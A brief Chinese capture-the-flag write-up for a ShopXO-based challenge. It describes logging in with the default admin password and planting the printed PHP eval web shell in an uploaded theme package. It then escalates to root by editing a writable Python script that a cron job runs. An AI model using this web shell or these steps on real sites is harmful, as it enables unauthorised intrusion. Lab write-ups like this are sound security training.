老八小超市
網頁是個購物網站模板,后台是admin.php
查詢得知ShopXO默認密碼為shopxo
登陸進入后台,查找主題模板,並下載免費的默認模板
在模板壓縮包的_static_目錄下,插入一句話木馬並上傳
<?php @eval($_POST[a]); phpinfo(); ?>
上傳以后會自動安裝
WP里面給了相關文章告訴我們文件路徑,這里查看主頁上的頭像也能知道文件的位置
之后我們構造url訪問,執行了phpinfo()
使用蟻劍連接,查看flag,提示flag位置
但是我們沒有訪問那個文件的權限
之后查看紅色的auto.sh文件,發現每隔60秒執行python文件
查看python文件,發現有修改權限,且有root的執行權限,能每60秒刷新hint文件。
學大佬修改python文件,讀取flag並寫入hint文件
查看得flag
PS:題目崩了一次,連接崩了幾次,做到頭疼